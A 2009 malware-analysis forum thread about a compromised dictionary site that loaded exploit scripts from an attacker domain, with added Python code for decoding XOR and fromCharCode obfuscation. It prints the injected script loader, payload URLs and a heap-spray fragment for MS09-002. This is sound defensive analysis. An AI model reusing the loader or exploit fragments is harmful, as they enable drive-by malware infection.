Malware Domain List
Malware Related => Malicious Domains => Topic started by: Shawn Jefferson on June 02, 2009, 10:47:13 pm
-
Our Symantec Endpoint Protection detected this site today, and I had a preliminary look at it; it looks malicious:
http://www.yourdictionary.com/dictionary-articles/german-english-translation.html
It loads scripts from www.rbseu.com (91.121.78.143), which then downloads (or attempts to download) from many other IPs.
Haven't looked at the files in too much depth from www.rbseu.com yet, but they are:
common.js
lastfunc.htm
m1.js
m2.js
subfunc.js (looks like it downloads a SWF file)
The malware may have been removed from the download sites already?
PS. I've downloaded some of the SWF files that subfunc.js downloads, but I'm having trouble decompiling them. I've tried Flare and HP SWFScan, but neither is working for me. Any suggestions?
-
One of the payloads is at /style.jpg
I'm running the rest of the code through Malzilla to decode it and find the second payload.
Two other scripts it's got:
/s1.js
/s2.js
/edit
VT results for style.jpg
http://www.virustotal.com/analisis/35d1f712765ee7ac8c1af03187823cf6350951be6605b7606894fcf9b6d3682f-1243985377
-
I plugged the m1 and m2 scripts into Malzilla and I think I got the shellcode out... and did an XOR search that found an XOR key of 0xBC.
This URL pops out:
thpt/:w/wwr.sbuec.mot/poj.gp
http://www.rbseu.com/top.jpg
Just verified the MD5s and it's the same file as style.jpg.
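The single-byte XOR search described in this post, written out as an added example (my code, not anything posted in the thread or produced by Malzilla). The sample blob is constructed here from the URL the post recovered; it is not the real shellcode. The "thpt/:w/ww..." ordering in the post is what a %uXXXX little-endian shellcode string looks like when its bytes are read in order, so the search below checks both the plain decode and a pair-swapped decode for every one of the 256 candidate keys. That pair-swap interpretation is my reading of the garbled string, not something the thread confirms.

```python
import re

# Constructed sample (NOT bytes from the page): the URL the thread recovered,
# stored the way a single-byte-XOR stager would carry it. KEY is the value the
# post reports; the pair swap models the "thpt/:w/ww..." ordering seen there
# (assumed to be a 16-bit little-endian string read byte by byte).
KEY = 0xBC
URL = b"http://www.rbseu.com/top.jpg"

# A URL printable all the way to its terminator; NUL and spaces stop the match.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def swap_pairs(data: bytes) -> bytes:
    """Swap each adjacent pair of bytes, i.e. byte-swap a 16-bit LE view."""
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same single-byte key."""
    return bytes(b ^ key for b in data)


def build_sample_blob() -> bytes:
    """Constructed stand-in for the extracted shellcode: filler, then the
    NUL-terminated URL pair-swapped and XORed with KEY, then more filler."""
    url_field = swap_pairs(URL + b"\x00\x00")  # even length keeps pairs aligned
    return bytes([0x90] * 8) + xor_bytes(url_field, KEY) + bytes([0xCC] * 4)


def find_xor_key(blob: bytes) -> list:
    """Brute-force all 256 single-byte keys and look for a URL in both the
    plain decode and the pair-swapped decode.

    Returns a list of (key, swapped, url) hits; an empty list means no
    single-byte XOR key exposes a URL and a different encoding is in play."""
    hits = []
    for key in range(256):
        decoded = xor_bytes(blob, key)
        for swapped, view in ((False, decoded), (True, swap_pairs(decoded))):
            for m in URL_RE.finditer(view):
                hits.append((key, swapped, m.group(0)))
    return hits


if __name__ == "__main__":
    for key, swapped, url in find_xor_key(build_sample_blob()):
        print(f"key=0x{key:02X} pair-swapped={swapped} url={url.decode()}")
```

Running the search against the constructed blob reports key 0xBC with the pair-swapped view, which is how the reversed-looking string in the post turns back into http://www.rbseu.com/top.jpg. On a real dump, extend URL_RE (or add a second marker such as b"MZ" for an embedded PE) if the stager carries something other than a URL.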
-
According to Anubis and VT, top.jpg is the same as style.jpg:
http://anubis.iseclab.org/?action=result&task_id=1fa7eac4cc3407ab4f977479d9c585e86&format=html
/edit
hehe, just noticed your mention of its being the same as style.jpg .....
/edit 2
Sadly, the code I was asking Malzilla to decode ended up crashing it ('twas the mck wrapped code - definitely some of the shellcode, but I couldn't get it to decode safely, and can't risk this machine). Wepawet couldn't deal with it either.
-
Hi,
Where did you get the s1 and s2 scripts? I didn't see them initially. edit2: found these myself!
How is the site infected? I didn't see anything on the source code of the page, and am not sure where else to look exactly! :)
edit: Found it! So simple, and I overlooked it once already. In the common.js script that loads from the yourdictionary.com site, there is this line:
document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));
Malzilla decodes this for me:
<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>
Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan. Are there other tools that may be able to do it?
It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.
for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));
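The String.fromCharCode trick found in common.js, decoded statically as an added example (my code; the thread used Malzilla for this, and nothing below is from the thread or from the malicious scripts). The sample input is the one-liner quoted in the post above, copied as posted, including its "XXXwrite" spelling; decoding the character codes and then parsing the result for script src attributes recovers the injected loader URL without ever executing the JavaScript.

```python
import re
from html.parser import HTMLParser

# Sample input: the obfuscated line quoted in the post above, copied as posted
# (the "document.XXXwrite" spelling is left exactly as it appears there).
SAMPLE_JS = (
    "document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,"
    "69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,"
    "58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,"
    "46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));"
)

# Matches String.fromCharCode( <numbers separated by commas/whitespace> )
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")


def decode_fromcharcode(js: str) -> list:
    """Return the decoded string for every String.fromCharCode(n, n, ...) call
    in js. Purely textual: no JavaScript is evaluated."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag fed to it."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lowercases tag names for us
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def find_injected_scripts(js: str) -> list:
    """Decode every fromCharCode payload in js and return the script src URLs
    it would have written into the page."""
    collector = ScriptSrcCollector()
    for html in decode_fromcharcode(js):
        collector.feed(html)
    return collector.srcs


if __name__ == "__main__":
    for html in decode_fromcharcode(SAMPLE_JS):
        print("decoded:", html.strip())
    for src in find_injected_scripts(SAMPLE_JS):
        print("injected script:", src)
```

The decoder handles only the one level of fromCharCode obfuscation seen on this page; a decoded string that itself contains another fromCharCode call would need decode_fromcharcode run again on the output.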
-
You can use Wepawet to decode the SWF files online. There are a couple of offline tools to do it, but I can't for the life of me remember them atm :(
-
Hi,
I found Wepawet (you had mentioned it earlier) and uploaded a couple of the SWF files. They download menu.jpg which is an executable, but with a different MD5 than the previous ones.
Thanks!
Shawn
-
No problem :)
-
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)
-
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)
I don't see any malicious content at rbseu.com.
All urls at this domain return
<h1>Bad Request (Invalid Hostname)</h1>
-
Interesting .... seems it's been taken down .... (unusual for OVH to be so fast)
-
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)
I don't see any malicious content at rbseu.com.
All urls at this domain return
<h1>Bad Request (Invalid Hostname)</h1>
Hey, I put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink. According to "samspade", "www .rbseu.com" is resolving:
http://samspade.org/whois/www.rbseu.com
-
Hey, I put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink. According to "samspade", "www .rbseu.com" is resolving:
http://samspade.org/whois/www.rbseu.com
It's resolving, but there is no content.